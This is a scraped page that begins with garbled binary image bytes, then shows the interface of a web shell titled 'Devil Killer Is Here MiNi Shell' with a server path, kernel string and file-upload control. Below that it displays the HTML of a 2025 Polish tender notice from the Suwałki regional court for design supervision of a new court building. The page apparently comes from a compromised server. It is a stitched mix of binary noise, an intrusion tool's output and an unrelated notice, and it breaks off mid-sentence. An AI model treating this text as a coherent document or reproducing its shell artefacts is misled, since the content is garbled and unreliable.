JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250331/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250331/0017012901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi pełnienia nadzoru autorskiego w ramach realizacji zadania pod nazwą „Budowa budynku dla Sądu Rejonowego w Suwałkach przy ul. Utrata ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Suwałkach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000570683</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Waryńskiego 45</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Suwałki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 563 12 37</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@suwalki.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">suwalki.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi pełnienia nadzoru autorskiego w ramach realizacji zadania pod nazwą „Budowa budynku dla Sądu Rejonowego w Suwałkach przy ul. Utrata ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3ace1135-e4ed-4406-82e5-06130110f650</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00170129</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00119651/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usługi pełnienia nadzoru autorskiego w ramach realizacji zadania pod nazwą „Budowa budynku dla Sądu Rejonowego w Suwałkach przy ul. Utrata ”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3ace1135-e4ed-4406-82e5-06130110f650 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">9.1	Postępowanie jest prowadzone w języku polskim.<br/>9.2	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl .<br/>9.3	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>9.4	Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl . Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>9.5	Identyfikator dostępny na Platformie e-Zamówienia<br/>9.6	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamów. <br/>cd-w/g SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">9.6	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>9.7	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>9.8	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych (Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.2020r. poz. 2453 z póź. Zm.).<br/>c.d.- w/g SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">w/g SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">w/g SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SG.261.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa pełnienia wielobranżowego nadzoru autorskiego nad realizacją zadania pod nazwą: „Budowa budynku dla Sądu Rejonowego w Suwałkach przy ul. Utrata ” , zgodnie z Dokumentacją, SWZ, z obowiązującymi przepisami prawa, normami, zasadami wiedzy technicznej oraz na ustalonych Umową warunkach. (dalej „Przedmiot Umowy” lub „Zadanie inwestycyjne”).”. <br/>Nadzór autorski w prawie budowlanym to działania podejmowane przez projektanta, mające na celu zapewnienie, że realizacja inwestycji jest zgodna z opracowanym projektem budowlanym oraz jego koncepcją estetyczną i funkcjonalną. Projektant sprawdza zgodność robót z dokumentacją projektową i uzgadnia możliwość wprowadzania rozwiązań zamiennych, jeśli zajdzie taka potrzeba. Zgodnie z prawem budowlanym, nadzór autorski należy do podstawowych obowiązków projektanta, a jego świadczenie chroni również jego interesy w ramach osobistych praw autorskich.<br/>W przypadku rozwiązań zamiennych nadzór autorski jest zobowiązany wystąpić o zgodę do Projektanta i taką zgodę uzyskać. Brak zgody projektanta powoduje przeniesienie na osobę sprawującą nadzór autorski wszystkich konsekwencji prawnych za ewentualne błędy, które spowoduje rozwiązanie zamienne.<br/>Pełnienie nadzoru autorskiego będzie polegać w szczególności na:<br/>•	weryfikacji zgodności realizowanych robót budowlanych z dokumentacją projektową<br/>•	wyjaśnianiu treści dokumentacji;<br/>•	wprowadzaniu w razie konieczności rozwiązań zamiennych do dokumentacji na wniosek kierownika budowy lub inspektora nadzoru;<br/>•	rozwiązywaniu kolizji projektowych powstałych podczas realizacji robót budowlanych z dokumentacją projektową;<br/>•	opracowywaniu i uzgadnianiu możliwości oraz sposobu wykonywania robót zamiennych i dodatkowych w stosunku do rozwiązań określonych w dokumentacji;<br/>•	aktualizacji projektów stałej organizacji ruchu;<br/>•	opracowywaniu i przedkładaniu do akceptacji Zamawiającemu Kart pobytu nadzoru autorskiego. cd w/g SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71248000-8 - Nadzór nad projektem i dokumentacją</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">39 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert. Całkowita cena ryczałtowa brutto - waga 60 % (60 pkt),<br/>Sposób dokonywania oceny ofert i przydzielania punktów:<br/>W celu przydzielenia punktów za cenę należy:<br/>a) ustalić dla każdej z ofert cenę brutto na podstawie „formularza ofertowego” <br/>b) ustalić ofertę o najniższej cenie (cena oferty brutto) i przydzielić jej najwyższą ilość, tj. 100 pkt x 60% = 60 pkt. <br/>c) pozostałym ofertom przydzielić punkty za cenę wg wzoru: <br/> najniższa cena brutto oferty (zł) <br/>ilość pkt. za cenę oferty = ---------------------------------------- x 100 pkt. x 60%<br/> cena brutto badanej oferty (zł)<br/><br/>Kryterium I - Całkowita cena ryczałtowa brutto - waga 60 % (60 pkt),<br/>Sposób dokonywania oceny ofert i przydzielania punktów:<br/>W celu przydzielenia punktów za cenę należy:<br/>a) ustalić dla każdej z ofert cenę brutto na podstawie „formularza ofertowego” <br/>b) ustalić ofertę o najniższej cenie (cena oferty brutto) i przydzielić jej najwyższą ilość, tj. 100 pkt x 60% = 60 pkt. <br/>c) pozostałym ofertom przydzielić punkty za cenę wg wzoru: <br/> najniższa cena brutto oferty (zł) <br/>ilość pkt. za cenę oferty = ---------------------------------------- x 100 pkt. x 60%<br/> cena brutto badanej oferty (zł)<br/><br/>Kryterium II - Doświadczenie osób pełniących funkcje inspektorów nadzoru autorskiego wyznaczonych do realizacji zamówienia. <br/>Ocenie podlega ilość zrealizowanych w okresie ostatnich 7 lat, liczonych wstecz od dnia, w którym upływa termin składania ofert, nadzorów autorskich nad robotami w poszczególnych branżach, polegających na: budowie, przebudowie lub remoncie budynku sądu lub innego obiektu kubaturowego na potrzeby Ministerstwa Sprawiedliwości o powierzchni całkowitej budynku minimum 1.000 m2 każda i usługę polegającą na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 łącznie– waga 40% (40 pkt.), w tym po max 8% (8 pkt.) dla każdej z osób sprawujących nadzór autorski poniższych branż. <br/>Kryterium II.1.: <br/>Zamawiający przyzna punkty za doświadczenie Koordynatora, Inspektora nadzoru autorskiego w specjalności architektonicznej, na następujących zasadach:<br/> Gdy wykaże:<br/>- 1 nadzór autorski na podstawie autorskiej dokumentacji nad realizacją (budowa, rozbudowa, przebudowa, remont) budynku sądu o powierzchni min. 1000m 2 , o wartości min.1 mln. zł brutto oraz<br/>- co najmniej jedną usługę polegającą na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 – otrzyma 4 pkt.<br/>Gdy wykaże:<br/>- 2 nadzory autorskiej na podstawie autorskiej dokumentacji nad realizacją (budowa, rozbudowa, przebudowa, remont) budynku sądu o powierzchni min. 1000m 2 , o wartości min.1 mln. zł brutto oraz<br/>- co najmniej 2 usługi polegające na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 –otrzyma 8 pkt.<br/>Analogicznie w pozostałych kryteriach, adekwatnie do specjalności:<br/>Kryterium II.2.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektora nadzoru autorskiego w specjalności konstrukcyjno-budowlanej.<br/>Kryterium II.3.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektora nadzoru autorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, na następujących zasadach.<br/>Kryterium II.4.: <br/>Zamawiający przyzna punkty za doświadczenie Inspektora nadzoru autorskiego w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych oraz ...cd w/g SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób pełniących funkcje inspektorów nadzoru autorskiego wyznaczonych do realizacji zamówienia. Ocenie podlega ilość zrealizowanych w okresie ostatnich 7 lat, liczonych wstecz od dnia, w którym upływa termin składania ofert, nadzorów autorskich nad robotami w poszczególnych branżach, polegających na: budowie, przebudowie lub remoncie budynku sądu lub innego obiektu kubaturowego na potrzeby Ministerstwa Sprawiedliwości o powierzchni całkowitej budynku minimum 1.000 m2 każda i usługę polegającą na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2 łącznie– waga 40% (40 pkt.), w tym po max 8% (8 pkt.) dla każdej z osób sprawujących nadzór autorski poniższych branż. cd w/g SWZ</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Rozdziale 6 SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>7.2	Zamawiający odstępuje od określenia następujących warunków w przedmiotowym postępowaniu: <br/>- Warunek dotyczący zdolności do występowania w obrocie gospodarczym,<br/>- Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>- Warunek dotyczący sytuacji ekonomicznej lub finansowej.<br/>7.3	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/><br/>1) zdolności technicznej lub zawodowej:<br/><br/>	Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże:<br/><br/>a)	Warunkiem udziału w postępowaniu jest posiadanie wiedzy <br/>i doświadczenia niezbędnego do wykonania przedmiotu zamówienia tzn. świadczenie usługi, w okresie ostatnich siedmiu lat, liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie łącznie:<br/>- co najmniej jednej usługi nadzoru autorskiego nad robotami budowlanymi prowadzonymi na podstawie autorskiej dokumentacji nad realizacją (budowa, rozbudowa, przebudowa, remont) budynku sądu o powierzchni min. 1000m 2 , o wartości min.1 mln. zł brutto oraz<br/>- co najmniej jednej usługi polegającej na zaprojektowaniu jednego budynku sądu lub innego budynku na potrzeby Ministerstwa Sprawiedliwości (budowa, rozbudowa, przebudowa, remont) o powierzchni użytkowej min.6000m 2: <br/><br/>W przypadku usług, których wartość została wyrażona w umowie w innej walucie niż PLN, należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień na dzień opublikowania ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN). Dana inwestycja będzie brana pod uwagę pod warunkiem, że została zakończona i pozytywnie odebrana. Wykonawca załączy dowody określające czy usługa ta została wykonana należycie.<br/><br/>b)	dysponuje osobami zdolnymi do wykonania zamówienia oraz skieruje je do realizacji zamówienia, tj.:<br/><br/>Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału w postępowaniu, jeżeli wykaże, że dysponuje wymaganą ilością osób zdolnych do wykonania zamówienia oraz skieruje je do realizacji zamówienia, tj.<br/><br/>cd.w/g SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z p. zm.), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia zostanie przekazany Wykonawcy wraz z wezwaniem;<br/>b)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>c)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>d)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>e)	Informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp. sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>f)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp. w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 3-6 ustawy Pzp oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust. 1 pkt 1, 5 i 7 ustawy Pzp - wzór oświadczenia zostanie przekazany wykonawcy wraz z wezwaniem;<br/>g)	Oświadczenie 